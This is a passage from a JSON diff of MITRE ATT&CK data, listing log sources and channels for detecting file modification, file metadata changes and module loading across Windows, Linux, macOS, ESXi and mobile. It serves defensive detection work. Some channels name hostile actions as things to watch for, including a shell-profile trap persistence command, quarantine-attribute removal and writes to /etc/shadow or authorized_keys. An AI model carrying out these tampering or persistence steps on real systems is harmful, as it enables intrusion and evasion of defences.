+                            "channel": "host daemon events related to file or VM permission changes"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Datastore file hidden or renamed unexpectedly"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Upload of file to datastore"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Storage access and file ops"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMware kernel events for file system permission modifications"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Datastore modification events"
+                        },
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/install.log"
+                        },
+                        {
+                            "name": "fs:filesystem",
+                            "channel": "Binary file hash changes outside of update/patch cycles"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating permission or attribute changes"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "filesystem monitoring of exec/open"
+                        },
+                        {
+                            "name": "fwupd:logs",
+                            "channel": "Firmware updates applied or failed"
+                        },
+                        {
+                            "name": "gatekeeper/quarantine database",
+                            "channel": "LaunchServices quarantine"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt or yum/dnf transaction logs (install/update of build tools)"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt/yum/dnf transaction logs; vendor updaters in systemd journals"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt install, remove, upgrade events"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "yum/dnf install or update transactions"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "event-based"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events, hash"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "hash, elf_info, file_metadata"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "elf_info, hash, yara_matches"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Read headers and detect MIME type mismatch"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events.path"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Filesystem modifications to trusted paths"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Write or modify .desktop file in XDG autostart path"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "hash, rpm_packages, deb_packages, file_events"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Discrepancies in _VBA_PROJECT p-code vs source code extracted with oletools/pcodedmp"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "application or system execution logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "file permission modification events in kernel messages"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel messages related to file system permission changes and security violations"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_file_rename_t or es_event_file_write_t"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_authentication"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "code_signing, file_metadata"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "mach_o_info, file_metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "softwareupdated/homebrew/install logs, pkginstalld events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "AMFI or Gatekeeper signature/notarization failures for newly installed dev components"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Detection of altered _VBA_PROJECT or PerformanceCache streams"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem:syspolicyd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File metadata updated with UF_HIDDEN flag"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code signature validation fails or is absent post-binary modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code signing verification failures or bypassed trust decisions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of new LaunchAgent or LoginItem plist files in ~/Library/LaunchAgents/"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "filesystem events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr -d com.apple.quarantine or similar attribute removal commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Gatekeeper quarantine policy decision anomalies recorded in com.apple.LaunchServices.QuarantineEventsV2"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pkginstalld/softwareupdated/Homebrew install transactions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "AMFI/Gatekeeper code signature or notarization failures"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "kernel extension and system extension logs related to file system security violations or SIP bypass attempts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected application binary modifications or altered signing status"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "extended attribute write or modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "New certificate trust settings added by unexpected process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.lsd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "installer or system_installd 'PackageKit: install succeeded/failed' with non-notarized or unknown signer"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Gatekeeper/AMFI 'code signature invalid' / 'not notarized' messages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation or modification with com.apple.ResourceFork extended attribute"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "OS version query results inconsistent with expected or approved version list"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Observed File Transfers"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for file permission modifications"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for file permission, ownership, and attribute modifications with user context"
+                        },
+                        {
+                            "name": "saas:RepoEvents",
+                            "channel": "New file added or modified in PR targeting CI/CD or build config (e.g., `gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Invalid/Unsigned image when developer tool launches newly installed binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned or invalid image for newly installed/updated binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Code integrity violations in boot-start drivers or firmware"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "CodeIntegrity reports 'Invalid image hash' or 'Unsigned image' for new/updated binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "SmartScreen or ASR blocks on newly downloaded installer/updater"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4656, 4658"
+                        },
+                        {
+                            "name": "WinEventLog:Setup",
+                            "channel": "MSI/Product install, repair or update events"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=15"
+                        },
+                        {
+                            "name": "WinEventLog:Windows Defender",
+                            "channel": "Operational log"
+                        },
+                        {
+                            "name": "WinEventLog:Windows Defender",
+                            "channel": "Operational"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-23 18:33:47.956000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0061",
+                            "external_id": "DC0061"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Modification",
+                    "description": "Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples: \n\n- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\\Windows\\System32\\drivers\\etc\\hosts` on Windows.\n- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.\n- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.\n- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.\n- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write calls modifying ~/.bashrc, ~/.profile, or /etc/paths.d"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File modification in /etc/paths.d or user shell rc files"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/quarantine.log"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of ~/Library/LaunchAgents or /Library/LaunchDaemons plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "AUDIT_SYSCALL (open, write, rename, unlink)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_WRITE, targeting .zshrc, .zlogin, .zprofile"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/install.log"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=2"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "execve call for modification of /etc/sudoers or writing to /var/db/sudo"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: File modifications under /etc/ssl/certs, /usr/local/share/ca-certificates, or /etc/pki/ca-trust/source/anchors"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "query: Enumeration of root certificates showing unexpected additions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, unlink, rename: Suspicious file access, deletion, or modification of sensitive paths"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Anomalous plist modifications or sensitive file overwrites by non-standard processes"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Modification or deletion of /etc/audit/audit.rules or /etc/audit/audit.conf"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write of .service unit files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write/unlink"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "loginwindow or desktopservices modified settings or files"
+                        },
+                        {
+                            "name": "ESXiLogs:messages",
+                            "channel": "changes to /etc/motd or /etc/vmware/welcome"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write, rename"
+                        },
+                        {
+                            "name": "containerd:runtime",
+                            "channel": "file change monitoring within /etc/cron.*, /tmp, or mounted volumes"
+                        },
+                        {
+                            "name": "esxi:cron",
+                            "channel": "manual edits to /etc/rc.local.d/local.sh or cron.d"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "/etc/passwd or /etc/group file write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "SecurityAgentPlugins modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write: File modifications to *.plist within LaunchAgents, LaunchDaemons, Application Support, or Preferences directories"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "boot"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of backgrounditems.btm or creation of LoginItems subdirectory in .app bundle"
+                        },
+                        {
+                            "name": "fs:filesystem",
+                            "channel": "Modification or creation of files matching 'com.apple.loginwindow.*.plist' in ~/Library/Preferences/ByHost"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write | PATH=/home/*/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "macos:auth",
+                            "channel": "~/.ssh/authorized_keys"
+                        },
+                        {
+                            "name": "gcp:audit",
+                            "channel": "compute.instances.setMetadata"
+                        },
+                        {
+                            "name": "azure:resource",
+                            "channel": "PATCH vm/authorized_keys"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "file write or edit"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "rename"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "file_write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of plist with apple.awt.UIElement set to TRUE"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "unlink, write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: Write operations targeting /dev/sda, /dev/nvme0n1, or EFI partition mounts"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write: Modification of /boot/grub/*, /boot/efi/EFI/*, or initramfs images"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "config-change: timezone or ntp server configuration change after a time query command"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "replace existing dylibs"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes to boot variables, startup image paths, or checksum verification failures"
+                        },
+                        {
+                            "name": "firmware:update",
+                            "channel": "Unexpected or unscheduled firmware updates, image overwrites, or failed signature validation"
+                        },
+                        {
+                            "name": "IntegrityCheck:ImageValidation",
+                            "channel": "Checksum or hash mismatch between running image and known-good vendor-provided image"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "File modifications in ~/Library/Preferences/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write to /etc/pam.d/*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /Library/Security/SecurityAgentPlugins"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modifications to Mail.app plist files controlling message rules"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write: Modification of structured stored data by suspicious processes"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Unexpected log entries or malformed SQL operations in databases"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected creation or modification of stored data files in protected directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat, write, rename, unlink"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file encrypted|new file with .encrypted extension|disk write burst"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "rename .vmdk to .*.locked|datastore write spike"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Mach-O binary modified or LC_LOAD_DYLIB segment inserted"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write syscalls targeting /etc/ld.so.preload or binaries in /usr/bin"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modified application plist or binary replacement in /Applications"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "admin command usage"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "startup-config"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation or overwrite in common web-hosting folders"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Unauthorized file modifications within datastore volumes via shell access or vCLI"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing 'crypto', 'key length', 'cipher', or downgrade of encryption settings"
+                        },
+                        {
+                            "name": "FirmwareLogs:Update",
+                            "channel": "Unexpected firmware or image updates modifying cryptographic modules"
+                        },
+                        {
+                            "name": "fs:plist",
+                            "channel": "/var/root/Library/Preferences/com.apple.loginwindow.plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "modification of existing .service file"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write or create events on *.pth, sitecustomize.py, usercustomize.py in site-packages or dist-packages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write of plist files in /Library/LaunchAgents or /Library/LaunchDaemons"
+                        },
+                        {
+                            "name": "WinEventLog:System",
+                            "channel": "Unexpected modification to lsass.exe or cryptdll.dll"
+                        },
+                        {
+                            "name": "networkconfig",
+                            "channel": "unexpected OS image file upload or modification events"
+                        },
+                        {
+                            "name": "network:runtime",
+                            "channel": "checksum or runtime memory verification failures"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: Modification of /boot/grub/* or /boot/efi/*"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /System/Library/CoreServices/boot.efi"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of LaunchAgents or LaunchDaemons plist files"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "rename,chmod"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "create/write/rename under user-writable paths"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Changes to LSFileQuarantineEnabled field in Info.plist"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file access to /usr/lib/cron/tabs/ and cron output files"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "modification of crontab or local.sh entries"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration file modified or replaced on network device"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Plist modifications containing virtualization run configurations"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file access to /usr/lib/cron/at and job execution path"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "binary modified or replaced"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "binary or module replacement event"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration change events referencing encryption, TLS/SSL, or IPSec settings"
+                        },
+                        {
+                            "name": "networkdevice:firmware",
+                            "channel": "Unexpected firmware update or image modification affecting crypto modules"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating permission, ownership, or extended attribute changes on critical paths. File system modification events with kFSEventStreamEventFlagItemChangeOwner, kFSEventStreamEventFlagItemXattrMod flags"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Modification of Display Manager configuration files (/etc/gdm3/*, /etc/lightdm/*)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification of /Library/Preferences/com.apple.loginwindow plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Modification of user shell profile or trap registration via echo/redirection (e.g., echo \"trap 'malicious_cmd' INT\" >> ~/.bashrc)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File write or append to .zshrc, .bash_profile, .zprofile, etc."
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, write, create, open"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Extensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write: File writes to application binaries or libraries at runtime"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CALCULATE: Mismatch in file integrity of critical macOS applications"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file write operations in /Library/WebServer/Documents"
+                        },
+                        {
+                            "name": "fs:launchdaemons",
+                            "channel": "file_modify"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "write: File modifications to /etc/systemd/sleep.conf or related power configuration files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "write: File modification to com.apple.PowerManagement.plist or related system preference files"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "modification of existing LaunchAgents plist"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create/modify dylib in monitored directories"
+                        },
+                        {
+                            "name": "WinEventLog:CodeIntegrity",
+                            "channel": "EventCode=3033"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write operation on /etc/passwd or /etc/shadow"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "modification to /var/db/dslocal/nodes/Default/users/"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "New or modified kernel object files (.ko) within /lib/modules directory"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "Modifications to /var/db/SystemPolicyConfiguration/KextPolicy or kext_policy table"
+                        },
+                        {
+                            "name": "networkdevice:audit",
+                            "channel": "SNMP configuration changes, such as enabling read/write access or modifying community strings"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "write"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "mount or losetup commands creating hidden or encrypted FS"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Hidden volume attachment or modification events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Suspicious plist edits for volume mounting behavior"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes to startup image paths, boot loader parameters, or debug flags"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "Checksum/hash mismatch between device OS image and baseline known-good version"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file writes"
+                        },
+                        {
+                            "name": "m365:defender",
+                            "channel": "OfficeTelemetry or DLP"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "Filesystem Access Logging"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing cryptographic hardware modules or disabling hardware acceleration"
+                        },
+                        {
+                            "name": "FirmwareLogs:Update",
+                            "channel": "Unexpected firmware updates that alter encryption libraries or disable hardware crypto modules"
+                        },
+                        {
+                            "name": "m365:office",
+                            "channel": "Anomalous editing of invoice or payment document templates"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "truncate, unlink, write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Modification or replacement of /Library/Application Support/com.apple.TCC/TCC.db or ~/Library/Application Support/com.apple.TCC/TCC.db"
+                        },
+                        {
+                            "name": "linux:fim",
+                            "channel": "Changes to /etc/rc.local.d/local.sh or creation of unexpected startup files in persistent partitions (/etc/init.d, /store, /locker)"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "write, rename"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write to /proc/*/mem or /proc/*/maps"
+                        },
+                        {
+                            "name": "sysdig:file",
+                            "channel": "evt.type=write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "rule definitions written to emond rule plists"
+                        },
+                        {
+                            "name": "networkdevice:config",
+                            "channel": "Configuration changes referencing older image versions or unexpected boot parameters"
+                        },
+                        {
+                            "name": "FileIntegrity:ImageValidation",
+                            "channel": "Hash/checksum mismatch against baseline vendor-provided OS image versions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write or rename to /etc/systemd/system or /etc/init.d"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file write to launchd plist paths"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "modification of entrypoint scripts or init containers"
+                        },
+                        {
+                            "name": "fs:plist_monitoring",
+                            "channel": "/Users/*/Library/Mail/V*/MailData/RulesActiveState.plist"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod/chown to /etc/passwd or /etc/shadow"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/write syscalls targeting web directory files"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Terminal/Editor processes modifying web folder"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "/var/log/vmkernel.log"
+                        },
+                        {
+                            "name": "AndroidLogs:FileSystem",
+                            "channel": "Modification to /system/etc/init/ or /vendor/etc/init/ boot-time scripts"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Creation or modification of LaunchDaemon or LaunchAgent plist in /System/Library/LaunchDaemons, /Library/LaunchDaemons, or /Library/LaunchAgents"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "INSERT or UPDATE of image/*, audio/*, video/* via ContentResolver with same URI re-written within short window; abnormal MIME/container change"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, hides, or marks message records in SMS store or messaging database immediately after SMS receive or send event"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application inserts, updates, deletes, or rewrites call-log records immediately after call-control action to conceal, alter, or synthesize call history"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "odification of ~/.ssh/authorized_keys or credential files"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.775000+00:00\", \"old_value\": \"2026-04-16 16:41:53.549000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.272000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0016",
+                            "external_id": "DC0016"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Module Load",
+                    "description": "When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "Module",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=7"
+                        },
+                        {
+                            "name": "ETW:LoadImage",
+                            "channel": "provider: ETW LoadImage events for images from user-writable/UNC paths"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "openat/read/mmap: Open/mmap .so files from non-standard paths"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "select: Open files path LIKE '/tmp/%.so' OR '/dev/shm/%.so'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dyld/unified log entries indicating image load from non-system paths"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "select: path LIKE '%/Library/%/*.dylib' OR '/tmp/*.dylib'"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "dynamic loading of sleep-related functions or sandbox detection libraries"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "LD_PRELOAD Logging"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Dynamic Linking State"
